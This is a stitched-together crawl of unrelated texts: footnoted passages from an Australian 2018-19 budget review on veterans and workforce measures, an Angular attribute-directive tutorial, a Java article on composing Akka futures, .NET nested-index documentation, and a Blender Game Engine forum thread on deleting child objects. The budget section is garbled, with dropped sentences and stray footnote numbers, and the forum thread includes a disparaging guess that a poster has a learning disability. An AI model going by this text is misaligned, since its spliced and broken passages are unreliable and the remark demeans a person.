the eyes trigger the gun controller to add the gun, and shooting and reload are in the gun. I just haven’t made reload yet though.
I’ll post a more complete version of what I’ve done…
Oh and there’s an annoying upload problem I’m having…My game is 5MB compressed so every time I want to upload the problem, I have to delete most of the objects, textures and materials to do so…any ideas on how to eliminate this problem?
Mediafire. Or Google Drive. Or Dropbox. Or other.
Off topic:
While I do agree that reading multiple tiny posts can be a hassle, I don’t mind it. I think he’s just using it like a chat
Some posts, like #7 are meant to be just a single post. I kind of don’t like reading one giant post that might take up the whole page
On topic:
The function that should actually end all children (his code doesn’t deal with children’s children):
Doesn’t that already happen automatically? all children are input into the scene if the parent is and deleted when the parent is deleted right?
I would connect this post and the previous one I made, but there’s no “connect” button or something. Just a suggestion…can you guys put one in there? I think it would benefit more people than just me
Oh, yes, of course (my head was stuck in a different engine).
Still, I would recommend you use this code, instead of his:
def end_children(parent): for c in parent.children: c.endObject()
It’s better, due to proper naming, and no redundant checks.
I don’t feel sorry for me, where are your games btw?
back to ON Topic.
this is far less complicated.
his whole system is a mess of states,
this is not.
WeaponSelfContainedLogicV4.blend (497 KB)
Point of information, objects do also have a childrenRecursive attribute, though I suspect you’ve already considered this case, given that ending objects linearly will likely cause reference errors when an object is ended before its children (as you iterate through, unless the attribute traverses bottom up)
Jeez, a little extreme, don’t ya think? All the blatant name callings, and insults…
Sure, he posts a lot (I never noticed until now, tbh) but he’s incredibly helpful.
OT: I have nothing to contribute to this thread, so I’ll be on my way
I would only parent one item to the gun manager ever,
and that way if there is a gun, its own.children[0]
(check my solution)
it uses .02ms->.04ms peak logic
btw you can use the property “Fire” to handle animations fire and reload,
and “Init” can handle “drawing” animation
I’ll need to rethink “gun remove” as it is instant at the moment.
*** Moderation ***
Your complete game is not needed as long as your complete game is not the problem.
I strongly suggest you recreate your problem in a small demonstration .blend.
The benefits:
Drawback:
Unfortunately this is not a chat and we do not want to be one. BluePrintRandom has to follow the forum rules as everybody else here. One rule says: “Don’t flood the forums with … unnecessary posts …”
He knows the solution: edit button
You can edit even your older posts. But if there are other posts already it is better to post a new one, except you want to correct the information of the old post. If you add information I recommend to mark it somehow that a reader knows it was added later.
*** End of Moderation ***
To provide some help on topic (not moderating):
It took me a while to identify the object that execute the deleteChildren.py code. An demonstration .blend as mentioned above would surely be an help. I do not even know how to test this game.
You mention you loop backwards through the code to avoid issues on deleting. This is not the case in this situation as you do not remove elements from the list. You end game objects. This has no influence on the list. The list will stay the same so you are save to loop forward.
Anyway the mentioned code from BluePrintRandom is sufficient (but a little bit too much).
def endChildren(object): for child in object.children: child.endObject()
Attribute children always returns a list. If there is no child the list is empty. You can test this situation.
You can but you do not need to end the “children of the children”. As you already expect the BGE ends objects together with their children. You can test that either.
Do you still have problems? | https://blenderartists.org/t/delete-children/614577 | CC-MAIN-2019-30 | en | refinedweb |
ThemeManager
ThemeManager is a most lightweight, powerful, convenient and easiest way to manage your app themes, and also support change text(e.g. language) or other configurations dynamically too.
Installing ThemeManager
ThemeManager supports CocoaPods and Carthage. ThemeManager is written in Swift.
Github Repo
You can pull the ThemeManager Github Repo and include the ThemeManager.xcodeproj to build a dynamic or static library.
CocoaPods
CocoaPods is a dependency manager for Cocoa projects. For usage and installation instructions, visit their website. To integrate ThemeManager into your Xcode project using CocoaPods, specify it in your
Podfile:
pod 'WYZThemeManager'
Carthage
Carthage is a decentralized dependency manager that builds your dependencies and provides you with binary frameworks. To integrate ThemeManager into your Xcode project using Carthage, specify it in your
Cartfile:
github "azone/ThemeManager" "master"
Swift Package Manager
The Swift Package Manager is a tool for automating the distribution of Swift code and is integrated into the swift compiler. It is in early development, but ThemeManager does support its use on supported platforms.
Once you have your Swift package set up, adding ThemeManager as a dependency is as easy as adding it to the dependencies value of your
Package.swift.
dependencies: [ .package(url: "", from: "0.2.0") ]
Usage
1. implement your self theme, language or other configuration (may be class, struct or anything you want) which must be conform
Theme protocol.
Example:
import ThemeManager struct MyTheme: Theme { var backgroundColor = UIColor.gray var mainColor = UIColor.orange var titleFont = UIFont.preferredFont(forTextStyle: .headline) var subtitleFont = UIFont.preferredFont(forTextStyle: .subheadline) var textColor = UIColor.red var buttonTitleColor = UIColor.orange var buttonTitleHighlightcolor = UIColor.red var title = "Default Theme" }
2. Declare
ThemeManager instance variable with your default theme in the global scope.
Example:
let themeManager = ThemeManager(MyTheme())
3. Put any theme, language or configuration related setups in
setUp method
Example
themeManager.setup(view) { (view, theme) in view.backgroundColor = theme.backgroundColor } themeManager.setup(navigationItem) { (item, theme) in item.title = theme.title } themeManager.setup(navigationController?.navigationBar) { (bar, theme) in bar.tintColor = theme.mainColor bar.barTintColor = theme.backgroundColor }
4. Change another theme, language or configuration with your theme instance:
themeManager.apply(otherTheme)
License
ThemeManager is released under the MIT license. See LICENSE for details.
Github
Help us keep the lights on
Dependencies
Used By
Total: 0 | https://swiftpack.co/package/azone/ThemeManager | CC-MAIN-2019-30 | en | refinedweb |
#include <termios.h>
int tcgetattr(int fildes, struct termios *termios_p);
int tcsetattr(int fildes, int optional_actions, const struct termios *termios_p);
int tcsendbreak(int fildes, int duration);
int tcdrain(int fildes);
int tcflush(int fildes, int queue_selector);
int tcflow(int fildes, int action);
speed_t cfgetospeed(const struct termios *termios_p);
int cfsetospeed(struct termios *termios_p, speed_t speed);
speed_t cfgetispeed(const struct termios *termios_p);
int cfsetispeed(struct termios *termios_p, speed_t speed);
#include <sys/types.h> #include <termios.h>
pid_t tcgetpgrp(int fildes);
int tcsetpgrp(int fildes, pid_t pgid);
pid_t tcgetsid(int fildes);
Many of the functions described here have a termios_p argument that is a pointer to a termios structure (see termios(M)).
The tcsetattr function sets the parameters associated with the terminal (unless support is required from the underlying hardware that is not available) from the termios structure referenced by termios_p, as follows:
Note that an error is not returned if the baud rates specified in
the
c_ispeed and
c_ospeed fields of the
termios structure are not supported by the
hardware. Instead, the baud rates remain unchanged and the other
termios settings are used.
If the terminal is not using asynchronous serial data transmission, the tcsendbreak function sends data to generate a break condition or returns without taking any action.
The tcdrain function waits until all output written to the object referred to by fildes has been transmitted.
The tcflush function discards data written to the object referred to by fildes but not transmitted, or data received but not read, depending on the value of queue_selector:
The input and output baud rates are stored in the termios structure. The values shown in the table are supported. The names in this table are defined in <termios.h>.cfgetospeed gets the output baud rate stored in the termios structure are no longer asserted. Normally, this disconnects the line.
cfgetispeed returns the input baud rate stored in the termios structure pointed to by termios_p.
cfsetispeed sets the input baud rate stored in the termios structure pointed to by termios_p to speed. If the input baud rate is set to zero, the input baud rate is specified by the value of the output baud rate.
Note that these settings take effect only on a successful call to tcsetattr.
Both cfsetispeed and cfsetospeed return a value of zero if successful and -1 to indicate an error. Attempts to set unsupported baud rates are ignored. This refers both to changes to baud rates not supported by the hardware, and to changes setting the input and output baud rates to different values if the hardware does not support this. In order to check whether a call to tcsetattr has successfully set a specified baud rate, call tcgetattr and use cfgetispeed and cfgetospeed to check the current settings.
tcgetpgrp returns the foreground process group ID of the terminal specified by fildes. tcgetpgrp is allowed from a process that is a member of a background process group; however, the information may be subsequently changed by a process that is a member of a foreground process group.
If there is no foreground process group, tcgetpgrp returns a value greater than 1 that does not match the process group ID of any existing process group.
On success, tcgetsid returns the session ID associated with the specified terminal. On failure, tcgetsid returns -1 and sets errno to identify the error.
On success, cfgetispeed returns the input baud rate from the termios structure.
On success, cfgetospeed returns the output baud rate from the termios structure.
On success, all other functions return 0. On failure, they return
-1 and set errno to identify the error. | http://osr507doc.xinuos.com/en/man/html.S/termios.S.html | CC-MAIN-2019-30 | en | refinedweb |
#include <CGAL/Filtered_predicate.h>
Filtered_predicate is an adaptor for predicate function objects that allows one to produce efficient and exact predicates.
It is used to build
CGAL::Filtered_kernel<CK> and can be used for other predicates too.
EP is the exact but supposedly slow predicate that is able to evaluate the predicate correctly. It will be called only when the filtering predicate,
FP, cannot compute the correct result. This failure of
FP must be done by throwing an exception.
To convert the geometric objects that are the arguments of the predicate, we use the function objects
C2E and
C2F, which must be of the form
Cartesian_converter or
Homogeneous_converter.
Example
The following example defines an efficient and exact version of the orientation predicate over three points using the Cartesian representation with double coordinates and without reference counting (
Simple_cartesian::Point_2). Of course, the orientation predicate can already be found in the kernel, but you can follow this example to filter your own predicates. It uses the fast but inexact predicate based on interval arithmetic for filtering and the slow but exact predicate based on multi-precision floats when the filtering predicate fails.
File Filtered_kernel/Filtered_predicate.cpp
The return type of the function operators.
It must also be the same type as
EP::result_type. | https://doc.cgal.org/4.7/Kernel_23/classCGAL_1_1Filtered__predicate.html | CC-MAIN-2019-30 | en | refinedweb |
import "github.com/sqp/godock/services/NetActivity"
Package NetActivity is a monitoring, upload and download applet for Cairo-Dock.
Improvements since original DropToShare version:
Not using temp files. Many new upload sites. Code simple and maintainable (400 lines for 18 backends).
Dependencies:
xsel or xclip command for clipboard interaction when build without gtk.
Not implemented (yet):
Icon for the applet. More menu options. Save image copy (and display). Custom upload scripts.
const ( // EmblemAction is the position of the "upload in progress" emblem. EmblemAction = cdtype.EmblemTopRight // EmblemDownload is the position of the "download in progress" emblem. EmblemDownload = cdtype.EmblemTopLeft )
NewApplet creates a new applet instance.
type Applet struct { cdtype.AppBase // Applet base and dock connection. // contains filtered or unexported fields }
Applet defines a dock applet.
DownloadVideo downloads the video from url.
Init load user configuration if needed and initialise applet.
UpToShareLastLink gets the link of the last item sent to a one-click hosting service.
UpToShareLinks gets all links of items sent to one-click hosting services.
UpToShareUploadString uploads data to a one-click site: file location or text.
UploadFiles uploads data to a one-click site: file location or text.
Package NetActivity imports 9 packages (graph) and is imported by 1 packages. Updated 2017-11-29. Refresh now. Tools for package owners. | https://godoc.org/github.com/sqp/godock/services/NetActivity | CC-MAIN-2019-30 | en | refinedweb |
import "k8s.io/kubernetes/pkg/kubectl/explain"
explain.go field_lookup.go fields_printer.go fields_printer_builder.go formatter.go model_printer.go recursive_fields_printer.go typename.go
GetTypeName returns the type of a schema.
LookupSchemaForField looks for the schema of a given path in a base schema.
func PrintModel(name string, writer *Formatter, builder fieldsPrinterBuilder, schema proto.Schema, gvk schema.GroupVersionKind) error
PrintModel prints the description of a schema in writer.
func PrintModelDescription(fieldsPath []string, w io.Writer, schema proto.Schema, gvk schema.GroupVersionKind, recursive bool) error
PrintModelDescription prints the description of a specific model or dot path. If recursive, all components nested within the fields of the schema will be printed.
func SplitAndParseResourceRequest(inResource string, mapper meta.RESTMapper) (string, []string, error)
SplitAndParseResourceRequest separates the users input into a model and fields
Formatter helps you write with indentation, and can wrap text as needed.
Indent creates a new Formatter that will indent the code by that much more.
Write writes a string with the indentation set for the Formatter. This is not wrapping text.
WriteWrapped writes a string with the indentation set for the Formatter, and wraps as needed.
Package explain imports 6 packages (graph) and is imported by 13 packages. Updated 2019-05-12. Refresh now. Tools for package owners. | https://godoc.org/k8s.io/kubernetes/pkg/kubectl/explain | CC-MAIN-2019-30 | en | refinedweb |
public class ArgumentCaptor<T> extends Object
Mockito verifies argument values in natural java style: by using an equals() method. This is also the recommended way of matching arguments because it makes tests clean & simple. In some situations though, it is helpful to assert on certain arguments after the actual verification. For example:
Example of capturing varargs:Example of capturing varargs:
ArgumentCaptor<Person> argument = ArgumentCaptor.forClass(Person.class); verify(mock).doSomething(argument.capture()); assertEquals("John", argument.getValue().getName());
//capturing varargs: ArgumentCaptor<Person> varArgs = ArgumentCaptor.forClass(Person.class); verify(mock).varArgMethod(varArgs.capture()); List expected = asList(new Person("John"), new Person("Jane")); assertEquals(expected, varArgs.getAllValues());
Warning: it is recommended to use ArgumentCaptor with verification but not with stubbing. Using ArgumentCaptor with stubbing may decrease test readability because captor is created outside of assert (aka verify or 'then') block. Also it may reduce defect localization because if stubbed method was not called then no argument is captured.
In a way ArgumentCaptor is related to custom argument matchers (see javadoc for
ArgumentMatcher class).
Both techniques can be used for making sure certain arguments were passed to mocks.
However, ArgumentCaptor may be a better fit if:
ArgumentMatcherare usually better for stubbing.
This utility class *doesn't do any type checks*. The generic signatures are only there to avoid casting in your code.
There is an annotation that you might find useful: @
Captor
See the full documentation on Mockito in javadoc for
Mockito class.
Captor
clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait
public T capture()
Internally, this method registers a special implementation of an
ArgumentMatcher.
This argument matcher stores the argument value so that you can use it later to perform assertions.
See examples in javadoc for
ArgumentCaptor class.
public T getValue()
getAllValues().
If verified method was called multiple times then this method it returns the latest captured value.
See examples in javadoc for
ArgumentCaptor class.
public List<T> getAllValues()
Example:
Example of capturing varargs:Example of capturing varargs:
mock.doSomething(new Person("John"); mock.doSomething(new Person("Jane"); ArgumentCaptor<Person> peopleCaptor = ArgumentCaptor.forClass(Person.class); verify(mock, times(2)).doSomething(peopleCaptor.capture()); List<Person> capturedPeople = peopleCaptor.getAllValues(); assertEquals("John", capturedPeople.get(0).getName()); assertEquals("Jane", capturedPeople.get(1).getName());
See more examples in javadoc forSee more examples in javadoc for
mock.countPeople(new Person("John"), new Person("Jane"); //vararg method ArgumentCaptor<Person> peopleCaptor = ArgumentCaptor.forClass(Person.class); verify(mock).countPeople(peopleCaptor.capture()); List expected = asList(new Person("John"), new Person("Jane")); assertEquals(expected, peopleCaptor.getAllValues());
ArgumentCaptorclass.
public static <U,S extends U> ArgumentCaptor<U> forClass(Class<S> clazz)
ArgumentCaptor.
Note that an
ArgumentCaptor *doesn't do any type checks*. It is only there to avoid casting
in your code. This might however change (type checks could be added) in a
future major release.
S- Type of clazz
U- Type of object captured by the newly built ArgumentCaptor
clazz- Type matching the parameter to be captured. | https://static.javadoc.io/org.mockito/mockito-core/3.0.0/org/mockito/ArgumentCaptor.html | CC-MAIN-2019-30 | en | refinedweb |
Bug#621851: [Pkg-utopia-maintainers] Bug#621851: network-manager: seems to trouble braille display
Am 12.04.2011 15:42, schrieb Michael Biebl: forwarded 621851 thanks Am 12.04.2011 15:11, schrieb Sébastien Hinderer: I'm resending this because I'm not sure whether it reached somebody or not... It did. I've forwarded your bug upstream as
Bug#609074: silo-llnl: error: Cannot link C++ and Fortran
Hi. On Thu, Jan 06, 2011 at 10:21:29AM +0900, Nobuhiro Iwamatsu wrote: Source: silo-llnl Version: 4.8-1 Severity: wishlist Tags: patch User: debian-...@superh.org Usertags: sh4 X-Debbugs-CC: debian-sup...@lists.debian.org Hi, silo-llnl FTBFS on SH4. Because configure included in qd
Bug#622382: ITP: lio-utils -- a simple low-level configuration tool set for LIO
On 04/13/2011 01:46 AM, Philipp Matthias Hahn wrote: On Tue, Apr 12, 2011 at 10:12:48PM +0530, Ritesh Raj Sarraf wrote: * URL : ... Description : a simple low-level configuration tool set for LIO lio-utils provide a simple low-level
Bug#535534: error present in squeeze too
found 535534 2.30.2-2 thanks I am running a fresh install of squeeze here. Problem appears most often when opening a browser (iceweasel 4.0 from mozilla.debian.net). Running gnome-settings-daemon manually afterwards works. I am using gnome-session with xmonad set as window manager. -- Abhishek
Bug#622575: Rotating display should automatically switch to appropriate vrgb subpixel antialiasing
Package: gnome-settings-daemon Version: 2.30.2-3 Severity: wishlist Currently, after rotating the display with xrandr -o left or xrandr -o right, gnome-settings-daemon continues using the same subpixel antialiasing mode. By definition, if the subpixel mode worked before rotation, it won't work
Bug#580880: pgfouine: changing back from O to ITA
Hi Christoph Thanks for looking at the package. On Mon, Apr 04, 2011 at 05:52:50PM +0200, Christoph Berg wrote: I've just had a look at your pgfouine package. Do you have any idea what debian/patches/10-include-path is good for, except for introducing gaping security holes? IMHO this one
Bug#622569: still ships rules files in /etc/udev/
On Wed, 13 Apr 2011 03:21:05 +0200, Marco d'Itri wrote: Package: libgphoto2-2 Version: 2.4.10.1-5 Severity: important Please move all rules files to /lib/udev/rules.d/ . Rules files in /etc/udev/ are especially bad because they are not re-read by udev on upgrades. I can't see /etc/ here?
Bug#622397: netperfmeter: Maybe too strong Recommends
On Dienstag 12 April 2011, Nelson A. de Oliveira wrote: Package: netperfmeter Version: 1.1.7-1 Severity: wishlist Hi! I was taking a look at netperfmeter and thinking if its recommends (iputils-ping, iputils-tracepath, subnetcalc, traceroute) aren't too strong (they should maybe be
Bug#622562: xserver-xorg-core: Use -config flag to specify output location when -configure also used
Hi, Chris Hiestand chiest...@salk.edu (12/04/2011): Package: xserver-xorg-core Version: 2:1.7.7-13 Severity: wishlist Tags: upstream feel free to discuss that with upstream: (product xorg, component Server/general) but I doubt it'll be considered. Not to
Bug#621706: It was a system bug after all
Shai Berger s...@platonix.com (13/04/2011): forwarded 621706 thanks Thanks. :) Thanks for your guidance and quick reply, You're welcome. KiBi. signature.asc Description: Digital signature
Bug#622556: libgnome-keyring0: Keyring no longer remembers passwords
Telepathy outputs this message when using version 3.0.0-1 : secret service operation failed: The algorithm 'dh-ietf1024-sha256-aes128-cbc-pkcs7' is not supported and going back to 2.32 does fix it. Jérémy. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject
Bug#622576: linux-image-2.6.38-2-amd64: Laptop reboot since upgrade to 2.6.38-3 kernel in testing
Package: linux-2.6 Version: 2.6.38-3 Severity: grave Justification: renders package unusable Hi, Since the upgrade of the kernel in testing to 2.6.38 I have had serious issues. Every once in a while, my laptop just reboots (It looks like a kernel panic, however, this is not displayed on
Bug#622577: rhythmbox: FTBFS: rb-playlist-source.c:38:29: fatal error: totem-pl-parser.h: No such file or directory
Source: rhythmbox Version: 2.90.1~20110329-1 Severity: serious Justification: FTBFS Hi, I think it was mentioned on IRC the other day but anyway: | … -o .libs/rb-playlist-source.o | rb-playlist-source.c:38:29: fatal error: totem-pl-parser.h: No such file or directory | compilation terminated.
Bug#622578: pulseaudio: FTBFS for +b1: mainloop_test-mainloop-test.o: undefined reference to symbol 'pa_timeval_rtstore'
Source: pulseaudio Version: 0.9.21-4 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round with: | /usr/bin/ld: mainloop_test-mainloop-test.o: undefined reference to symbol 'pa_timeval_rtstore' | /usr/bin/ld: note: 'pa_timeval_rtstore' is defined in DSO
Bug#622371: transition: webkit
involves: I would prefer to
Bug#622579: qbittorrent: FTBFS for +b1: error: 'default_name_check' is not a member of 'boost::filesystem3::path'
Source: qbittorrent Version: 2.4.11-1 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round: | [… other errors…] | make[3]: *** [qtorrenthandle.o] Error 1 | make[3]: *** Waiting for unfinished jobs | ../../src/bittorrent.cpp: In constructor
Bug#622580: sylpheed: FTBFS for +b1: /usr/bin/ld: compose.o: undefined reference to symbol 'enchant_broker_list_dicts'
Source: sylpheed Version: 3.1.0-1 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round with: | /bin/bash ../libtool --mode=link gcc -g -O2 -pthread -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -pthread -I/usr/include/gtkspell-2.0
Bug#622581: nouveau driver fails to load with error undefined symbol: miEmptyData
Package: xserver-xorg-video-nouveau Version: 1:0.0.16+git20101210+8bb8231-2 Severity: critical Just installed the new kernel+drm+x11 in testing, and I can't start x11. It dies with a dlopen error complaining of an undefined symbol. -- Package-specific info: X server symlink status:
Bug#622582: anon-proxy: FTBFS on kfreebsd-*: undefined reference to symbol 'pthread_join@@GLIBC_2.3'
Source: anon-proxy Version: 00.05.38+20081230-1.1 Severity: serious Justification: FTBFS User: debian-...@lists.debian.org Usertags: kfreebsd Hi, your package no longer builds on kfreebsd-*, presumably due to a missing -lpthread there: | g++ -g -O2 -Wall -D_REENTRANT -I/usr/include
Bug#622583: deng: FTBFS everywhere: bsp_main.o: undefined reference to symbol 'ceil@@GLIBC_2.2.5'
Source: deng Version: 1.9.0-beta6.9+dfsg1-1 Severity: serious Justification: FTBFS Hi, you seem to be missing (at least) -lm: | Linking C executable doomsday | CMakeFiles/doomsday.dir/external/lzss/unix/src/lzss.o: In function `lzOpenChunk': |
Bug#622584: XB-Python-Version: header and broken grammar in long description
Package: trac-privateticketsplugin Version: 2.0.3-1 Severity: minor Hello, debian/control contains an indented line reading XB-Python-Version: ${python:Versions} which is interpreted to be part of the long description. I'm sure this is not intended. Other than that I think
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
On Wed, Apr 13, 2011 at 9:22 AM, Timo Juhani Lindfors timo.lindf...@iki.fi wrote: if (last >= total_size) { *errmsg = _("Partition ends in the final partial cylinder"); return -1; } and the check was added in commit 7eda085c41faa3445b4b168ce78ab18dab87d98a Author: Karel Zak
Bug#621815: metacity and openbox both running
I got a ps listing and grepped for metacity or openbox: testit 2159 2081 4 09:46 ? 00:00:02 gnome-session --default-session-key /desktop/gnome/session/openbox_session testit 2193 2159 0 09:46 ? 00:00:00 /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session
Bug#622579: qbittorrent: FTBFS for +b1: error: 'default_name_check' is not a member of 'boost::filesystem3::path'
Hi, You have an old version of qBittorrent and a recent version of boost (with new filesystem v3 API by default). Either update qBittorrent or add a DEFINE to force the filesystem v2 API from boost (1). (1) To do so, just add DEFINES += BOOST_FILESYSTEM_VERSION=2 to qbittorrent/src/src.pro
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
Hi, thanks for the report. I can reproduce the problem with the attached partition table image. parttable1.img.xz Description: Binary data I see the code has if (last >= total_size) { *errmsg = _("Partition ends in the final partial cylinder"); return -1; } and the check was added in
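For illustration, the arithmetic behind that check can be sketched in shell with made-up geometry values (cfdisk derives the real numbers from the BIOS/kernel geometry; everything below is hypothetical):

```shell
# total_size counts only whole cylinders, so a disk usually has a few spare
# sectors beyond it; a partition reaching into that tail ends with
# last >= total_size and trips the "final partial cylinder" check quoted above
heads=255 sectors=63 cylinders=1023
total_size=$((heads * sectors * cylinders))   # 16434495 sectors in full cylinders
last=16500000                                 # hypothetical last sector of a partition
if [ "$last" -ge "$total_size" ]; then
    echo "Partition ends in the final partial cylinder"
fi
```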
Bug#622581: nouveau driver fails to load with error undefined symbol: miEmptyData
On 2011-04-13 09:01 +0200, Itai Seggev wrote: Just installed new the kernel+drm+x11 in testing, and I get start x11. It dies with a dlopen error complaining of an undefined symbol. I suppose that is because you have outdated locally installed files. Did you build nouveau from source some
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
On Wed, Apr 13, 2011 at 9:33 AM, Timo Juhani Lindfors timo.lindf...@iki.fi wrote: Olaf van der Spek olafvds...@gmail.com writes: In that case it should be forwarded upstream. Sure, but I couldn't find the upstream BTS. I was just adding extra info to the bug report since I hit the same bug.
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
Olaf van der Spek olafvds...@gmail.com writes: In that case it should be forwarded upstream. Sure, but I couldn't find the upstream BTS. I was just adding extra info to the bug report since I hit the same bug. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a
Bug#620304: tmux: Incorrect dropping of privileges allows users to obtain utmp group privileges
Hello Nicholas, On Wed, Apr 13, 2011 at 12:31 AM, Nicholas Marriott nicholas.marri...@gmail.com wrote: Hi Not to say I told you so or anything, but this might be a good time to reiterate that doing this is a bad idea: the minor inconvenience it prevents (easily avoided by the user with
Bug#615153: exec: 58: /usr: Permission denied
# Probably ---
Bug#622038: lingot: FTBFS: lingot-audio-jack.c:180:28: error: 'JackPortIsActive' undeclared (first use in this function)
On 11 April 2011 06:24, Ibán Cereijo iba...@gmail.com wrote: Hi, Thanks for your report. It seems that Lingot 0.9.0 only compiles with libjack version 2, and that dependency is not tracked in the configure script. I've fixed it and now Lingot compiles again with libjack version 1 (and 2).
Bug#613284: Bug#612065: Bug#613284: Please remove support for modconf
tags 613284 +tags tags 613284 +pending thanks Hi! * Alexander Reichle-Schmehl toli...@debian.org [110408 14:05]: Has there been any progress on this bug? Looking at the pppoe script, modconf doesn't seem to be an integral part, but just a fallback solution, so it should be easy to remove
Bug#622560: signing-party: please include a way to parse gpgparticipants output for caff
Re: Luca Capello 2011-04-13 87d3krt4y5@gismo.pca.it $ grep -A 1 '\[x\].*\[x\]' $FILE | grep ^pub | cut -c 13-20 This generates a list of all keys to be signed, one per line, which however caff does not accept, given that it expects keys as last argument separated by spaces. However,
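To bridge the gap, the one-per-line output can be joined into the space-separated list caff expects. A minimal shell sketch — only the pipeline itself is taken from the message above; the sample input file is hypothetical, so the real gpgparticipants layout (and hence the cut offsets) may differ:

```shell
# hypothetical gpgparticipants-style output for two checked-off participants
cat > participants.txt <<'EOF'
012  [x] Fingerprint OK        [x] ID OK
pub   1024D/0123ABCD 2001-01-01
013  [x] Fingerprint OK        [x] ID OK
pub   4096R/89EFCDAB 2009-05-05
EOF

# same pipeline as in the report, plus tr to turn newlines into spaces so the
# key IDs become one space-separated argument list
KEYS=$(grep -A 1 '\[x\].*\[x\]' participants.txt | grep '^pub' | cut -c 13-20 | tr '\n' ' ')
echo "$KEYS"
# then: caff $KEYS   (unquoted on purpose, so the shell word-splits it)
```

The trailing space left by tr is harmless when the variable is expanded unquoted on caff's command line.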
Bug#622388: closed by Josselin Mouette j...@debian.org (reply to 622...@bugs.debian.org) (Re: Bug#622388: can't use libpam-gnome-keyring outside of gnome)
On Tue, Apr 12, 2011 at 06:03:18PM +, Debian Bug Tracking System wrote: This is an automatic notification regarding your Bug report which was filed against the libpam-gnome-keyring package: #622388: can't use libpam-gnome-keyring outside of gnome You need to launch it:
Bug#622586: [valgrind] new upstream 3.6.1
Package: valgrind Version: 1:3.6.0~svn11254+nmu1 Severity: wishlist --- Please enter the report below this line. --- Valgrind 3.6.1 is available: It supports glibc 2.13, which is in experimental now for Debian, but hopefully it will be in unstable
Bug#622587: wpasupplicant: Please, switch CONFIG_IEEE80211W on.
Package: wpasupplicant Version: 0.7.3-2 Severity: wishlist hostap on squeeze and later has CONFIG_IEEE80211W, but wpasupplicant still doesn't. Please switch it on. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact
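For concreteness, the requested change is a one-line switch in wpa_supplicant's build-time configuration; where exactly the Debian packaging keeps this file is an assumption (upstream ships the template as wpa_supplicant/defconfig):

```shell
# in wpa_supplicant's build .config, enable management frame protection:
CONFIG_IEEE80211W=y
```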
Bug#622274: Better visibility of what can you do with Debian on the Debian main page
Bug#622588: all_proxy environment variable confuses LWP::UserAgent
Package: libwww-perl Version: 5.837-1 Severity: normal File: /usr/share/perl5/LWP/UserAgent.pm -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, GNOME creates environment variables according to the settings in the GNOME control panel, e.g. http_proxy, https_proxy etc. If the user selects “use
Bug#622589: wpasupplicant doesn't work from network/interfaces
Package: wpasupplicant Version: 0.7.3-2 Severity: normal After upgrading to 0.7.3-2 from 0.6.10-2.1 wpasupplicant stopped working from network/interfaces, because functions.sh doesn't wait until wpasupplicant starts. % sudo ifup --verbose eth4 Starting /sbin/wpa_supplicant... wpa_supplicant:
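A hedged sketch of the kind of wait the reporter is describing — polling until the daemon's control socket shows up instead of racing ahead. The socket path is an assumption about this setup, not something functions.sh actually does:

```shell
# wait_for_path PATH [TRIES]: poll every 0.1 s until PATH exists or we give up;
# returns success only if PATH appeared in time
wait_for_path() {
    path=$1
    tries=${2:-50}
    i=0
    while [ ! -e "$path" ] && [ "$i" -lt "$tries" ]; do
        sleep 0.1
        i=$((i + 1))
    done
    [ -e "$path" ]
}

# e.g. after starting the daemon (socket path and interface are hypothetical):
# wait_for_path /var/run/wpa_supplicant/eth4 || echo "wpa_supplicant not ready"
```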
Bug#615153: exec: 58: /usr: Permission denied
found 615153 xserver-xorg/1:7.5+8 quit Jonathan Nieder wrote:
Bug#588305: cifs-utils: Can't mount shares of the type host/directory/sharename
Hi Luk! Thanks for your explanation. On Mon, Apr 11, 2011 at 07:38:49PM +0200, Luk Claes wrote: Is a sharename containing a '/' what you meant by directory/sharename or is it even something else? Well, it is a Windows share, so I don’t really know how it is configured. Maybe my explanation
Bug#622590: Homepage has changed
Source: raincat Version: 1.1-1 Severity: minor -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, because I happened to come across this: The homepage of raincat is now (and the download link on that page is broken :-(). Greetings, Joachim - -- System
Bug#622591: crash in ChertVersion::create
Package: libsearch-xapian-perl Version: 1.2.3.0-1 Severity: normal I have a reproducible segfault in xapian, that seems to occur when the database is being first created, but oddly seems depenadnt on a particular input corpus being indexed -- similar sites with other content don't crash. (gdb)
Bug#622592: Typo in package description
Package: python-aptdaemon Version: 0.31+bzr413-1.1 Severity: minor Dear Maintainers, translating the package description to German I found a typo in the short description. Description: Python module for the server and client of aptdaemon should be Description: Python modules for the server and
Bug#622593: ITP: libeval-closure-perl -- Perl module to safely and cleanly create closures via string eval
Package: wnpp Severity: wishlist Owner: Alessandro Ghedini al3x...@gmail.com * Package name: libeval-closure-perl Version : 0.03 Upstream Author : Jesse Luehrs d...@tozt.net * URL : * License : GPL-1+ or Artistic
Bug#622594: luakit: popup window inactive since upgrade to new libgtk
Package: luakit Version: 2011.04.04-1 Severity: minor Hello, Since I upgraded the libgtk of my box the popup windows (for example on warning about my strange browser) are grey and inactive. -- System Information: Debian Release: wheezy/sid APT prefers unstable
Bug#621913: dictionaries-common: Dictionaries-common won't configure because no dictionary is selected.
Agustin, On Tuesday, April 12, 2011 05:55:55 am Agustin Martin wrote: On Sun, Apr 10, 2011 at 07:49:03PM -0700, Soren Stoutner wrote: In this case there should be a value for the question as well as a list of possible alternatives, and none of them appear. Both wamerican and wbritish did
Bug#622570: linux-image-2.6.38-2-s390x: Unable to handle kernel pointer dereference at virtual kernel address (null).
Hi Stephen,
Bug#622595: mountpoint: fails for bind-mounts
